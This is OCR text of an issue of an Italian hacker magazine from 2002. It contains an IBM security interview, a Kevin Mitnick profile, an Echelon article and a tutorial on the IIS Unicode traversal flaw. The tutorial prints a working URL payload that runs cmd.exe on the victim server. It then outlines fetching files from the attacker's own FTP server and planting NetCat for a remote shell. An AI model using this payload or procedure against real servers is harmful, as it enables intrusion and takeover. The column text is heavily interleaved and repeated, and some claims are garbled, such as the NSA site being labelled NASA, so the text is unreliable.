cie in reti leggermente più corpose che te in Windows è davvero mastodonti- mediante il proprio ip locale
quelle costituita da tre o quattro mac- ca. ma sfruttando un’altra
chine) da un Backup Domain Control- Lasciamo stare dunque WINS, PDC macchina che funzionerà da
ler: una macchina che contiene tutte le e compagnia e diamo un’occhiata a gateway, fornendo a loro,
informazioni stipate nel PDC e che come le varie postazioni vengono accesso al web, ma con un IP
quindi, in caso di qualsiasi problema a identificate tra loro: abbiamo già ac- di propria classe che sarà
quest’ultimo, può prenderne il posto e cennato al fatto che, comunque, ven- quello utilizzato da TUTTE le
permettere alla LAN di continuare ad gono utilizzati indirizzi IP come vedia- macchine della sottorete per
operare correttamente. mo nella sezione a fianco. K uscire su internet.

04.2002 | HACKER’S JOURNAL | 17


sicurezza

IBM:ANALISI SULLA SICUREZZA DELLE RETI INFORMATICHE

L’ultima
campagna

“Sicuramente” stampa
IBM
dedicata
alla

IBM sicurezza

Le reti italiane sono


sicure… più o meno come
una Panda lanciata
a 180 all’ora
in autostrada. Ce lo rivela
IBM, in una intervista
ricca di spunti
interessanti… PADRONI DEL PROPRIO BUSINESS
Mariangela
Fagnani,
Security
& Privacy
a Qual è la vostra
idea di “sicurez-
za informatica” e
a quali presupposti
se stesso. E’ un problema di uno skill
non adeguato. Per mantenere l’efficien-
za di una rete informatica anche solo di
una LAN bisogna aggiornarla e moni-
Practice dovrebbe rispondere? torarla in continuazione.
Leader Il concetto di sicurezza per IBM implica
di IBM Global un’analisi a 360 gradi di qualsiasi si- aSono frequenti i casi
Service. stema informatico per capirne caratte- di hacking o attacchi
ristiche ed eventuali vulnerabilità. Dal- vari a reti aziendali
l’analisi accurata di infrastrutture, pro- e quanti danni causano?
cedure, strati aziendali e soluzioni tec- E’ possibile darne una
Hacker Journal nologiche si riesce a determinare con quantificazione in ter-
ha deciso di saltare buona attendibilità il livello di sicurezza mini monetari?
la barricata di un sistema. Difficile ricostruire uno spaccato della si-
e di recarsi tuazione italiana perché non esistono
nella “tana aUna fotografia della dati sufficienti a creare un grafico attendi-
del nemico” come situazione italiana: i bile. Questo perché molte società vittime
simpaticamente server e le reti sono ge- di attacchi non li denunciano e quindi i
possiamo definire neralmente vulnerabili, dati sono frammentari e rappresentano
la sede di IBM Italia. oppure abbiamo un buon uno spaccato davvero poco attendibile
Lo scopo è semplice: livello di sicurezza? della situazione italiana.
cercare di capire lo (Un attimo di riflessione). La sicurezza in E’ altrettanto vero che comunque gli at-
stato della sicurezza Italia sta sicuramente migliorando, au- tacchi a sistemi informatici ci sono, anche
informatica in Italia. mentano gli investimenti delle aziende e a quelli di grandi aziende.
Il nostro interlocutore la sensibilità verso questo tipo di pro- L’anno scorso, ad esempio, alcune grosse
è Mariangela blema. società sono state letteralmente bloccate
Fagnani, Security Tuttavia è innegabile che spesso molte per attacchi di varia natura che non han-
& Privacy Practice strutture presentano un preoccupante li- no di fatto provocato grandi perdite di da-
Leader di IBM Global vello di vulnerabilità riconducibile non ti, ma che hanno causato un blocco dei
Service. E’ lei che tanto alla struttura in sé, che viene spes- server per due o tre giorni.
ci guida alla scoperta so creata con sufficiente attenzione a Fare una stima monetaria dei danni non è
di un mondo, quello questo tipo di problematiche, ma dallo semplice, ma per un’azienda che fattura
della sicurezza, scarso mantenimento e dalla mancan- centinaia di miliardi rimanere bloccata per
che riserva non za di aggiornamento del sistema che tre giorni rappresenta un danno economi-
poche sorprese… K viene il più delle volte abbandonato a co rilevante.

18 | www.hackerjournal.it
aChe posizione ha IBM aMolti vorrebbero sapere “...I SISTEMI
rispetto a Linux e ai
sistemi Open Source?
come si fa ad arrivare ad
avere un “posto al sole”
HANNO SPESSO UN
Linux è una delle piattaforme più sicure nel settore sicurezza di ELEVATO LIVELLO
in assoluto e deve questa sua sicurezza
proprio al fatto di essere un sistema
IBM, quali percorsi, qua-
li studi? DI
aperto, migliorato e sviluppato da una Beh, la trafila è abbastanza normale. VULNERABILITÀ...”
moltitudine di utenti. In genere occorre una solida prepara-
Sono sicura che Linux è destinato a dif- zione a livello tecnico e buona cono- > M. Fagnani, Sicurezza IBM
fondersi come piattaforma informatica scenza delle reti tcp/ip. Poi un percor-
per le aziende. so scolastico di tipo universitario rap- “Computer crime and security
Al momento forse è ancora frenato da presenta un requisito essenziale. IBM survey 2002”
una serie di pregiudizi, come la diffi- attinge proprio dall’Università per re-
denza da parte di molte aziende circa clutare giovani che poi vengono fatti E il rapporto annuale messo a pun-
l’effettiva possibilità di trovare, dopo crescere all’interno della struttura to dal Csi (Computer security institute) di
aver installato il sistema, un’assistenza aziendale. Quello della formazione è San Francisco e dalla squadra anti-cri-
adeguata. uno dei canali più seguiti da IBM, co- mini informatici dell'Fbi da cui si ricava
munque non disdegniamo di acquisire uno spaccato piuttosto interessante della
aChe cosa ne pensate dei figure professionali già formate, con sicurezza delle società americane in
nuovi sistemi operativi uno skill di tutto rispetto. Questo spes- chiave informatica.
proprietari Windows-like? so porta all’azienda un valore aggiun- Dal rapporto del 2002 si evidenzia
(Risatina). Cos’è una domanda trabocchetto? to e nuove conoscenze. che la fonte di maggior pericolo per le
aziende è rappresentata da Inter-
aForse...possiamo net. Il campione di intervistati è di 3.500
anche soprassedere... professionisti responsabili dei sistemi ITC
(Altra risatina). No parliamone pure del o comunque a capo dell’organizzazione
resto non è un mistero. E’ vero che mol- informatica di società americane me-
to software di Microsoft non presenta dio/grandi.
una grande attenzione in termini di sicu- L’intervista ha rivelato che il 59 per
rezza… cento degli attacchi informatici ar-
riva dalla rete.
aUnicode non è un ca- Di questi, il 40 per cento è effettuato
so isolato... da cracker che cercano a vario titolo, a
Direi di no. Il problema è dato anche volte riuscendovi, di penetrare all'interno
da un altro elemento innegabile: Mi- dei dati aziendali, sfruttando Internet
crosoft ha una grande diffusione co- come canale di comunicazione e le
sì come i suoi prodotti. vulnerabilità di sistemi e software come
Quindi un software Microsoft viene aAbbiamo già definito la porta d'ingresso.
testato da una quantità molto gran- figura dell’esperto di Ma non sono solo i pirati informatici
de di utenti, questo aumenta sensi- sicurezza. E quella a bucare i sistemi e appropriarsi di da-
bilmente le possibilità che vengano dell’hacker? Proviamo a ti "sensibili". Sempre secondo l'indagine
scoperti e segnalati bug o difetti. tracciarne un profilo. tra i soggetti che violano sistemi di si-
Il fatto che un software non riveli E’ un curioso. Uno che per passione, curezza di vario genere sono presenti in
nessuna falla, forse dipende anche per voglia di conoscere, di acquisire maniera massiccia gli ex dipendenti
dalla sua scarsa diffusione. informazioni, entra nei sistemi infor- licenziati (75% dei casi), società
Pochi lo comprano, pochi lo usano, matici, violandone le difese e senza concorrenti statunitensi (38%) e in-
ci sono meno probabilità di rilevare lasciare molte tracce dietro di sé. ternazionali (26%).
difetti strutturali. Raramente fa dei danni veri, la sua Richard Power, direttore del Compu-
motivazione principale è quella di ac- ter security institute di San Francisco, ha
aQuali sono le soluzioni quisire informazioni non di distrugge- ammesso che le perdite medie dichia-
proposte da IBM in te- re i sistemi informatici. rate dalle società campione per attac-
ma di sicurezza e a chi Certo si registrano attacchi distruttivi a chi di tipo informatico ammontano a
sono rivolte, solo alle reti e server ma questi non sono fatti circa 2 milioni di dollari all’anno.
aziende o anche ai pri- dagli hacker singoli, ma da organiz- Una cifra assolutamente incredibile.
vati? zazioni strutturate con base criminale Se poi si pensa che solo il 44 per cen-
Prevalentemente alle aziende e qui il che vogliono colpire dei bersagli con to degli intervistati ha voluto quantifica-
parco di soluzioni è davvero ampio, si intenti distruttivi. re le perdite economiche subite si arri-
va dalla consulenza pura all’analisi di Si parla di reti criminali vere e proprie. va comunque a un dato parziale di
sistemi informatici aziendali, da cui de- L’hacker, quello vero, probabilmente è 455 milioni di dollari all’anno, una
riva poi il suggerimento di soluzioni tec- ideologicamente in contrasto con que- piccola fortuna…
nologiche adeguate. sto tipo di ambientazione criminale. K

www.hackerjournal.it | 19
miti & leggende

IL PIÙ GRANDE HACKER DI TUTTI I TEMPI

IN RETE Il volo del Condor


ANTE HACKER
Se Mitnick è l’hacker più Detenuto da circa 4 anni,
famoso al mondo sicuramente
non è stato il primo. In Kevin Mitnick continua
questo senso si segnala tale
John Draper che intorno agli a fare parlare di sé.
anni sessanta aveva trovato
il modo di telefonare gratis E’ stato il più geniale hacker
usando un fischietto
contenuto nelle patatine del mondo, probabilmente
“Captain Crunch”. Questo
emetteva un segnale acustico lo è ancora, senz’altro è il più
con una frequenza che,
al momento della chiamata, famoso. Per molti paladino
paralizzava il centralino
consentendo a Draper, di Internet libero, per altri,
diventato poi per tutti
Captain Crunch, pochi, un pericoloso criminale
di telefonare gratis da un

M
capo all’altro del mondo.
itnick per lungo tempo è stato alle grandi banche dati delle società infor-
una specie di Primula Rossa. Per matiche del paese, per riuscire a carpire tut-
RASSEGNA STAMPA incastrarlo sono stati necessari te quelle informazioni che dovrebbero esse-
Se volete avere due anni fitti di investigazioni da re, secondo Mitnick, patrimonio di tutti in
un panorama davvero parte dell’FBI e mesi e mesi di nome di una visione utopica di Internet libe-
esaustivo di tutti monitoraggi continui da Minneapolis a ro. Informazioni che invece vengono tenute
gli articoli che riguardano Washington, fino a Denver e Colorado. segrete e custodite gelosamente proprio dal-
Mitnick basta accedere Inizia la sua “carriera” mentre frequenta le società di software. Per Mitnick tutto ciò è
all’indirizzo: la Monroe High School di Los Angeles dove intollerabile.
http://hpgx.net/willday/mitn riesce ad accedere alla banca dati centrale La teoria che l’interesse di Mitnick per
ick.html, spartano ma del distretto scolastico; solo due anni dopo si Bonnie non fosse determinato da un folle
assolutamente imperdibile. migliora, eludendo i codici di accesso dei amore ma da motivi più opportunistici è av-
computer del dipartimento di Difesa Ameri- valorata anche da un amico, il quale affer-
cana. In seguito a questa prodezza passa i ma senza ombra di incertezza: “Kevin non è
SHIMOMURA successivi sei mesi al sole della California, o stato mai particolarmente attratto dalle don-
SE LA GODE per meglio dire all’ombra, nella prigione di ne, credo che abbia per l’altro sesso lo stes-
“L’amato” Mr. Shimomura massima sicurezza Youth Autorithy. Alla fine so interesse che nutre per un silicon chip”.
nel frattempo ha incassato del 1983 è già fuori, pronto a ricominciare! Grazie all’accesso privilegiato alle reti te-
un anticipo di 750.000 US$ lefoniche garantito da Bonnie, il nostro “pi-
per il libro che ha scritto, rata” tenta il grande colpo: si inserisce nel
“Sulle tracce di Kevin”
>> “Hacker Story” computer della Digital Equipment Corpora-
(edizione Sperling & Kupfler). tion di Palo Alto e copia alcuni programmi

I n questo periodo conosce Bonnie Vitello,


una donna di sei anni più vecchia, dalla
folta chioma castana e dal fisico esile: un
per computer assolutamente top-secret.
Il Condor è attratto dal VAX/VMS un si-
stema operativo proprietario di Digital, pra-
personaggio un po’ anonimo, che sarebbe ticamente inattaccabile, esente da bug, l’u-
diventato sua moglie! Bonnie lavora come nico nel suo genere. Mitnick vuole carpire i
manager alla GTE, la compagnia telefonica segreti della Digital, vuole scoprire i segreti
di Los Angeles, ed è proprio questo ruolo del VAX/VMS.
che colpisce la fantasia di Mitnick. Infatti, Anche in questo caso, come sempre,
realizza subito che Bonnie potrebbe vera- cambia il suo nome di accredito telefonico
mente essere fondamentale per accedere in James Bond e modifica gli ultimi tre nu-

20 | www.hackerjournal.it
FREE KEVIN
meri di riferimento digitati in 007: una vera
finezza!
Naturalmente, questo colpo non passa
trascura un elemento fondamentale. Il PC
dell’esperto di sicurezza è programmato per
trasmettere una serie di copie di file di routine
IN RETE
inosservato e l’FBI si lancia sulle sue tracce. in un’altra parte della rete informatica in sua IL SITO
Mitnick viene “beccato” in una sera di di- assenza, e precisamente al San Diego Super- UFFICIALE
cembre dagli agenti della FBI mentre si sta computer Center. L’intervento di Mitnick quin- Tutto quello che
recando nell’ufficio di Bonnie per la solita di fa subito scattare l’allarme proprio alla SC riguarda Kevin
scorribanda informatica. di San Diego e Shimomura viene richiamato Mitnick si trova
Viene accusato di danni ai sistemi infor- urgentemente dalla sua vacanza sciistica per nel suo sito ufficiale
matici di società per un ammontare di cin- cercare di ricostruire l’attacco al suo PC. all’indirizzo
que milioni di dollari! Naturalmente di Mitnick non rimangono http://www.kevinmitnick.com. Il
Proprio a seguito di questa sentenza fini- che poche tracce, per l’attacco ha usato una sito è stato creato dai suoi
sce per trascorrere i successivi 22 mesi a nuova tecnica denominata IP-spoofing difficil- sostenitori più accaniti ed è un
Lompoc, una prigione di alta sicurezza nel mente intercettabile, ma Shimomura ha una vero e proprio luogo di culto.
sud della California. E, in seguito, nel Beit prova dell’esistenza di un super hacker.
T’Sluvah Center, per persone con gravi pro- Poco dopo il manager della Netcom -altra
blemi mentali. società nel mirino di Mitnick-, Robert Hood, IL GIOCO
Dopo questo periodo di “cura” Mitnick ri- ha finalmente una traccia dell’hacker. Infatti, DEL
prende “il lavoro”. Utilizzando Social Engi- come comunicherà in seguito all’agente del- FUGGITIVO
neering, una tecnica di hacking più sofisti- l’FBI Levord Burns, individua una serie di in- Se volete ripetere
cata, torna alla carica per cercare di carpi- trusioni in diversi “Points of Presence” (POPs), l’inseguimento di
re i segreti delle grandi società informati- della Netcom attraverso accessi pubblici via Shimomura a Mitnick
che. La sua è voglia di conoscenza, tutte le telematica situati in diverse città degli Stati in una specie di gioco
informazioni che acquisisce non vengono Uniti. In particolare dal POP (919)558XXXX di ruolo, potete farlo sul
utilizzate per scopi criminali, né vengo- situato proprio a Relaigh in North Carolina e sito:
no rivendute per procurarsi vantaggi eco- utilizzato per una serie di intrusioni a catena. http://www.well.com/user/jli
nomici. No, il Condor si batte solo per il di- E’ proprio questo l'indizio che porterà gli ttman/game/. Propedeutico
ritto alla conoscenza, viola le banche dati agenti dell’FBI, guidati da Shimomura, da- per capire meglio la vicenda
solo per apprendere, ma purtroppo per lui vanti alla porta dell'appartamento di Mitnick. e sviscerare i profili
questa sua aspirazione, per quanto alimen- Perché il più grande hacker di tutti i tempi psicologici di quelli che
tata da motivazioni nobili, è già di per sé un sia stato arrestato non è semplice da spiega- vengono considerati i
reato per il governo americano. re. La risposta si trova nella directory di Inter- protagonisti della storia,
Quando l’attenzione nei suoi confronti net <thantos@ruinc.mind.org>, la forni- compreso il “cacciatore di
comincia a rifarsi insistente, Mitnick scom- sce un altro hacker super ricercato: Legion. taglie” Shimomura, alter ego
pare nuovamente dalla circolazione facen- “Mitinick è rimasto prigioniero non dell‘FBI, di Mitnick.
do perdere le sue tracce. ma della sua stessa ossessione a violare si-
stemi di sicurezza per carpire informazioni...
>> La sfida non è riuscito a fermarsi, ha volutamente TUTTI LINK
spinto la propria opera di saccheggio oltre DI MITNICK
ogni limite consentito. Se solo avesse voluto File MP3 di canzoni

N el dicembre del 1994, proprio il gior-


no di Natale, i destini di Mitnick e Shi-
momura si incrociano: comincia così la
nessuno sarebbe mai riuscito a mettergli un
paio di ‘braccialetti’ ai polsi...”
Invece le cose sono andate diversamente e
intitolate “Free
Kevin Mitnick“, la
sequenza
grande caccia... Infatti, come riporta il New così quella sera del 15 febbraio Mitnick è fi- dell’attacco al PC di
York Times, Shimomura si sta recando a San nito in carcere, dove si trova tutt’ora. Il popo- Shimomura, tutti questi link
Francisco quando Mitnick “viola” il sistema di lo della rete gli ha dedicato nel frattempo un trovano spazio all’indirizzo:
sicurezza del suo computer, nella sua casa di sontuoso sito: http://www.kevinmitnick.com. ”http://www.albany.net/~dsiss
San Diego. Il messaggio che lascia sullo In Home page al posto del solito contatore man/mitnick.html.
schermo del computer di Shimomura è de- c’è un countdown che segna, secondo dopo Purtroppo molti non sono
gno di un film di azione: “Find me. I am secondo, quanto tempo manca alla scarcera- più attivi ma il materiale
on the net”, “Trovami, sono sulla rete”. Ma zione di Mitnick. Nel momento in cui scrivia- a disposizione è comunque
è proprio in questo frangente che Mitnick mo questo articolo mancano ancora nove notevole e non mancherà
commette il suo primo grossolano errore. In- mesi, 28 giorni, 9 ore, due minuti, 18 secon- di suscitare gli
fatti, nel momento in cui Mitnick viola il siste- di,anzi diciassette, anzi sedici… apprezzamenti di tutti i fans
ma di sicurezza del computer di Shimomura Dopodiché il Condor tornerà a volare… K dell’hacker.

www.hackerjournal.it | 21
Spionaggio

UN SISTEMA DI INTERCETTAZIONE “GLOBALE”

Sorridi: Echelon ti spia


Se avete sempre pensato
che il vostro portinaio
fosse la più formidabile
risorsa per carpire
informazioni, sappiate
che non è così, esiste
un sistema
di intercettazione dati
che è molto più efficiente
di 1.000 portinai messi
insieme, forse anche
di 2.000… ECHELON
! La parola deriva dal francese
antico eschelon, a sua volta dal tardo
latino scala, da cui scalino, ma anche

E
Esiste un Grande Fra- passo dopo passo, sempre più definita. In reticolato a gradinata, scaglione, e
tello? E se sì, è più simile a particolare prove concrete della sua esi- infine, "gruppo di unità singole non
quello ipotizzato da Geor- stenza si trovano su un libro pubblicato allineate". Che sarebbero, secondo fonti
ge Orwell nel suo libro nel 1996: "Secret Power", in cui l'autore non ufficiali, le intelligence di Stati Uniti,
“1984”, oppure assomi- Nicky Hager, cita numerose testimonianze Gran Bretagna, Canada, Australia e
glia in modo inquietante a raccolte intervistando circa 50 persone co- Nuova Zelanda.
quello di Taricone e soci? La domanda involte nei servizi segreti, che lavoravano
ha una sua risposta ben precisa: il o avevano lavorato per la più grande
“Grande Fratello” capace di sorvegliare agenzia di intelligence della Nuova Ze- Echelon è un sistema estremamente
tutto e tutti esiste, si chiama Echelon e ar- landa, la Government Communica- complesso per intercettare ogni forma di
riva in ogni casa spiando tra le pieghe tions Security Bureau (GCSB). E pro- comunicazione: dalla telefonata, al fax, fi-
della nostra vita privata. prio la Nuova Zelanda rappresenta uno no all’e-mail. Nulla sfugge.
dei Paesi che hanno contribuito in modo Echelon è globale in grado di control-
preciso alla nascita di Echelon. Alla base lare le comunicazioni tra persone che si
>> Le prime tracce c’è un patto sancito nel 1948 e denomi- scambiano informazioni tra paesi diversi
negli Anni ‘70 nato UKUSA Strategy Agreement, cui ade- ma anche di controllare le comunicazioni
rirono, la National Security Agency Statu- di persone nello stesso paese, in pratica
Dell’esistenza di un sistema di intercet- nitense, il Government Communications ovunque nel mondo. Benché sia nato e si
tazione globale si è sempre parlato e te- Headquarters (GCHQ) Britannico, la sia sviluppato in un periodo di “guerra
muto, tuttavia il primo a portare delle pro- Communications Security Establishment fredda” non ha primariamente scopi bel-
ve e ha rivelarne l’esistenza è stato un (CSE) Canadese, ed il Defense Signals Di- lici, forse li ha avuti in una prima fase em-
giornalista, Duncan Campbell, che ne rectorate (DSD) Australiano. In base agli brionale del suo sviluppo, ma oggi serve
parlò per la prima volta in un articolo in- accordi, gli Stati membri avrebbero co- soprattutto ai paesi che ne fanno parte
titolato "Big Brother is listening" pubblicato operato per sviluppare un sistema di spio- per esercitare un controllo globale su tut-
dal New Statesman di Londra nel 1981. naggio globale progettato dall'NSA il cui to quello che avviene e per filtrare, inter-
Successivamente a prove si aggiunsero al- nome in codice sarebbe stato inizialmente cettare e catalogare milioni di informazio-
tre prove e la struttura di Echelon divenne, "Progetto P-415", poi cambiato in Echelon. ni riservate.

22 | www.hackerjournal.it
Echelon non è stato progettato per membro. Così, di fatto, le stazioni degli si che ne fanno parte, soprattutto gli Stati
spiare una particolare e-mail di un indivi- alleati minori della alleanza funzionano Uniti. Con Echelon si possono condizio-
duo o una utenza fax specifica. per la NSA come se fossero proprio basi nare le trattative commerciali. Il Sunday
Al contrario, il sistema lavora indiscri- fuori dal territorio USA. Ognuno delle cin- Times qualche tempo fa ha riportato che
minatamente intercettando grandissime que stazioni dove sono i “Dizionari” pos- la società di intermediazione francese
quantità di comunicazioni, e attraverso siede un nome in codice che la distingue Thompson CSF ha perduto un contratto
l’uso di computer è in grado di filtrare le dalle altre della rete. Questi nomi in codi- da I,4 milioni di dollari per la fornitura
informazioni e di estrarre solo quelle rite- ce sono registrati all’inizio di ogni mes- di un sistema radar al Brasile. Le trattative
nute interessanti: frammenti di dati raccol- saggio intercettato prima che sia distribui- ben avviate sono state intercettate, attra-
ti tra milioni di informazioni con una pre- to attraverso il network di Echelon , e per- verso Echelon, e la società americana
cisione quasi chirurgica. Echelon è sostan- mettono così all’analizzatore di individua- Raytheon ha potuto conoscere tutti gli ele-
zialmente organizzato come una catena re subito quale stazione ha effettuato l’in- menti della trattativa e ne ha approfittato
di strutture di intercettazione in giro per il tercettazione. Un ulteriore componente per “scippare”, proponendo presumibil-
pianeta per monitorare la rete di teleco- del sistema Echelon intercetta una serie di mente condizioni lievemente migliori, la
municazioni globale . comunicazioni satellitari non veicolate dal commessa alla società d’Oltralpe.
Alcune strutture controllano i satelliti di sistema “intelsat”. Vi è poi un insieme di E’ evidente che questo è un gioco spor-
comunicazione , altre i network a terra ed strutture per monitorare le comunicazioni co: un po’ come partecipare ad un’offerta
altre le comunicazioni radio. Echelon le- via terra: rappresentano l’elemento finale a buste chiuse per ottenere un appalto, co-
ga insieme tutte queste strutture renden- del sistema. Sono ovviamente anche un noscendo già in anticipo le offerte dei con-
do così possibile agli Stati Uniti ed ai suoi bersaglio per intercettazioni su larga sca- correnti. Ma è solo uno dei tanti casi. Co-
alleati di intercettare una grande quantità la di classiche comunicazioni nazionali tra me si può sfuggire ad Echelon? Non serve
delle comunicazioni in atto nel pianeta. I le persone, e naturalmente neanche que- criptare i documenti, nel senso che il siste-
computer posti in ogni stazione del siste- sto sfugge ad Echelon che approfitta di ma è in grado di individuare quelli criptati
ma ECHELON cercano tra i milioni di questa larga via di trasmissione dati per e separarli dalla marea di comunicazione
messaggi intercettati quelli conte- effettuare controlli contemporanei su un come elementi sensibili.
nenti le keywords, le parole chiave , flusso di informazioni assolutamente gi- Certo ci mette un po’ di più ad impar-
precedentemente inserite. Le keywords, gantesco. Le informazioni più scontate sul tire tutte le istruzioni, perde alcuni minuti:
includono elementi che possono avere sistema Echelon si trovano sul sito della probabilmente se qualche milione di inter-
una qualsiasi rilevanza: nomi, località, NASA (www.nsa.gouv), quelle più im- nauti si mettessero contemporaneamente
soggetti, ma anche parole apparente- barazzanti ve le diamo noi. Echelon è da ad inviare documenti criptati il sistema si
mente “pericolose” o strane che possano una parte un sistema di sorveglianza, di- bloccherebbe in modo inesorabile: ma
fare pensare ad un sistema di messaggi- ciamo un metodo preventivo per scongiu- questo è improbabile. Forse l’unico siste-
stica in codice. rare forse eventi criminosi, e fin qui nulla ma è di tornare ai metodi antichi che non
Ogni parola di ogni messaggio inter- di male. Ma se usato in modo scorretto contemplino alcuna tecnologia: piccioni
cettato viene scansionata automatica- (ammesso che cacciare il naso nelle no- viaggiatori, corrispondenza scritta e ma-
mente da qualsiasi fonte provenga. Le stre faccende sia un comportamento legit- gari qualche bell’emissario con tanto di
migliaia di messaggi simultanei vengono timo), può essere uno strumento capace messaggio chiuso con ceralacca, alla fac-
letti in “tempo reale” come giungono alle di conferire vantaggi ingiustificati ai pae- cia di Matrix.. K
stazioni, ora dopo ora, giorno dopo gior-
no e i computer riescono a trovare “l’ago”
scelto dagli intelligence nel “pagliaio” del-
le telecomunicazioni . I computer nelle
stazioni in giro per il mondo sono chia-
mati, all’interno del network, i “Dizionari”.

>>Un’idea vecchia
ma nuova...
L’esistenza di computer come i “Dizio-
nari” non è una novità, erano già usati
all’epoca della guerra fredda, ma rappre-
sentavano unità singole e autonome non
comunicanti tra loro. La novità di Echelon
è stata quella di creare un Network per-
fettamente integrato dove i singoli compu-
ter dialogano con tutti gli altri e sono in
grado, non solo di scambiarsi informazio-
ni, ma anche di utilizzare la lista di key- Echelon è un sistema di controllo globale che filtra e-mail, fax e comunicazioni
words elaborata da ogni singolo Paese telefoniche attraverso basi periferiche organizzate come un grande Network.

www.hackerjournal.it | 23
sicurezza

UNA PERICOLOSA FALLA PER WINDOWS XP

Salmoni
col cappello nero
Cosa pensereste
se qualcuno vi dicesse
che un estraneo può
prendere possesso del
vostro PC e governarlo
in remoto? Fantascienza?
Se siete amministratori
di un web server basato
su Windows NT potreste
diventare protagonisti
dell’invasione
degli ultracorpi…

P
una implementazione di questo baco. borati numerosi sistemi di codifica; pur-
In pratica si tratta di un sistema di co- troppo molti di essi agiscono conflittual-
ur trattandosi di una vulne- difica universale dei caratteri, valido, mente tra loro, e, molto banalmente, ac-
rabilità conosciuta e fortu- appunto, per ogni piattaforma, applica- cade che un documento codificato in un
natamente patchata ormai zione o lingua esistenti. certo modo sia solo parzialmente, se non
da svariati mesi (che in ter- del tutto, illeggibile da una applicazione
mini informatici vuol dire che invece poggia su un altro standard.
“un’epoca”), sono ancora in molti, tra UNICODE IN SINTESI L’avvento di Internet ed il conseguente in-
Unicode assegna un numero
gli amministratori di sistemi Windows cremento di postazioni informatiche in tut-
univoco a ogni carattere,
NT (4.0 o 5.0 che sia), a non aver an- indipendentemente dalla to il mondo ha reso necessario lo svilup-
cora applicato i fix rilasciati da Micro- piattaforma, po di un sistema universale di codifica, in
soft, e che pertanto, ad oggi, conti- indipendentemente dall'ap- modo da non costringere utenti e svilup-
nuano ad esporre i propri web server plicazione, patori ad impazzire dietro ad URL che ri-
a questa pericolosa vulnerabilità. indipendentemente dalla sultano errati su un sistema ma validi in
lingua. un altri, documenti di testo che sostituisco-
no caratteri tra loro se letti con un word
>> Che cos’è Unicode? processor invece che con un altro, eccete-
Per poter rappresentare i caratteri alfa- ra eccetera…
Vediamo dunque di capire per bene numerici tramite un elaboratore elettroni- Basti pensare per un momento a tutti
di cosa si tratta, come e perché fun- co (che di norma si trova “più a suo agio” quei popoli che utilizzano sistemi alfabeti-
ziona, e quali problemi derivano da con i numeri) fino ad ora sono stati ela- ci differenti da quello romanico (per in-

24 | www.hackerjournal.it
tenderci, giapponesi, cinesi, arabi…) per
realizzare che l’avvento di questo stan-
dard abbia rappresentato un grosso bal-
Unicode all’interno di IIS. Quando al
webserver in questione chiediamo una co-
sa come "..\..\" esso la scarta, in quanto
OCCHIO!
zo in avanti per quanto riguarda la por- errata. Purtroppo (o per foruna J) quando Per inserirsi nella
tabilità delle informazioni in rete. invece la stessa richiesta viene passata falla di unicode è
Entrando nello specifico, ciò che ci in- mediante codificazione unicode, quest’ul- sufficiente
teressa maggiormente è l’implementa- tima viene accolta come “buona” e quin- utilizzare il più
zione di unicode nei vari sistemi opera- di processata. classico dei metodi
tivi che di fatto offrono servizi in rete: un Se quindi in luogo di “..\..\” poniamo il di trasferimento di
server web, per esempio, saprà ricono- loro corrispondente valore unicode, ecco dati: FTP. Il nostro problema
scere un URL chiamatogli da un qualsia- che siamo in grado di “risalire la corren- è che non basta lanciare FTP
si browser (Explore, Netscape, Mozilla…) te” sfuggendo alla directory assegnata al- sulla macchina remota, in
mediante questa codifica. la lettura web. A questo punto abbiamo quanto l’esecuzione del
Un giorno, smanettando allegramente accesso ai dati contenuti nel sistema, ma comando non farebbe altro che
sulla sua tastiera, un anonimo individuo la cosa peggiore, come abbiamo già avu- lanciare il processo
scoprì (probabilmente quasi per caso) to modo di accennare, è che trovata una relativo, lasciandoci poi
che un URL di questo tipo: shell (cmd.exe, per esempio J) possiamo sempre alle prese con la
eseguire arbitrariamente comandi sul nostra shell invece che con
http://address.of.iis5.sys webserver. quella di FTP, e pertanto
tem/scripts/..%c1%1c../win Se sulla macchina vittima potessimo ad impossibilitati ad
nt/system32/cmd.exe?/c+dir esempio uploadare files, sarebbe molto, utilizzarlo. Per fortuna FTP
+c:\ molto semplice montarvi sopra una qualche accetta parametri, tra i
backdoor ed ottenere accesso completo al si- quali “-s nomefile”, che ci
stema. E’ infatti sufficiente utilizzare il più permette di porre in un
non restituiva altro che la directory di c:\ classico dei metodi di trasferimento di dati: qualsiasi file una lista di
dell’host “address.of.iis5.system”, lan- FTP. Il nostro problema è che non basta lan- comandi da far eseguire a FTP
ciando di fatto da remoto un comando ciare FTP sulla macchina remota, in in un’unica chiamata.
presente sull’host. Cosa che, inutile dirlo, quanto l’esecuzione del comando non fareb- Basterebbe quindi poter
non dovrebbe mai accadere: se al posto be altro che lanciare il processo relativo, la- scrivere dentro ad un file i
di quel “dir+c:\” finale ponessimo infatti sciandoci poi sempre alle prese con la nostra comandi adatti per farli poi
qualche altra cosa, sarebbe facile intuire shell invece che con quella di FTP, e pertanto eseguire da FTP: per far ciò
i problemi di sicurezza. Il trucco è sem- impossibilitati ad utilizzarlo. Per fortuna FTP non faremo altro che
plice: l’implementazione unicode pro- accetta parametri, tra i quali “-s nomefile”, utilizzare il comando “echo”:
pria dei web server Microsoft Internet In- che ci permette di porre in un qualsiasi file Questa linea aggiungerà la
formation Server è affetta da una imper- una lista di comandi da far eseguire a FTP in stringa “hello!” al file
fezione (una delle tante J) che ci permet- un’unica chiamata. “c:\test.txt”.
tedi “risalire” tra le directory del sistema, Basterebbe quindi poter scrivere dentro ad Tramite echo prepareremo la
uscendo da quella a cui dovremmo avere un file i comandi adatti per farli poi eseguire lista di comandi da far
normalmente accesso in lettura (inetpub e da FTP: per far ciò non faremo altro che uti- eseguire ad FTP, tramite il
figli, dove appunto risiedono i file web), lizzare il comando “echo”: quale preleveremo poi dalla
esattamente come i salmoni riescono Questa linea, per esempio, aggiungerà la nostra macchina (sulla quale
a risalire la corrente dei fiumi, per ritro- stringa “hello!” al file “c:\test.txt”. avremo preventivamente
varci poi nella cartella principale. Da qui, Avrete già immaginato come va a finire: installato un FTP server) il
una chiamata a winnt/system32/cmd.exe tramite echo prepareremo la lista di coman- file che ci interessa
ci fornisce di fatto una shell remota; la di da far eseguire ad FTP, tramite il quale pre- uploadare. Inutile dire che
possibilità di eseguire qualsiasi comando leveremo poi dalla nostra macchina (sulla la cosa più semplice è
sul server. Questo accade perché, nor- quale avremo preventivamente installato un spedire alla vittima un bel
malmente, una richiesta quale: FTP server) il file che ci interessa uploadare. NetCat, che lanceremo poi in
INUTILE dire che la cosa più semplice è spe- modalità shadow: collegandoci
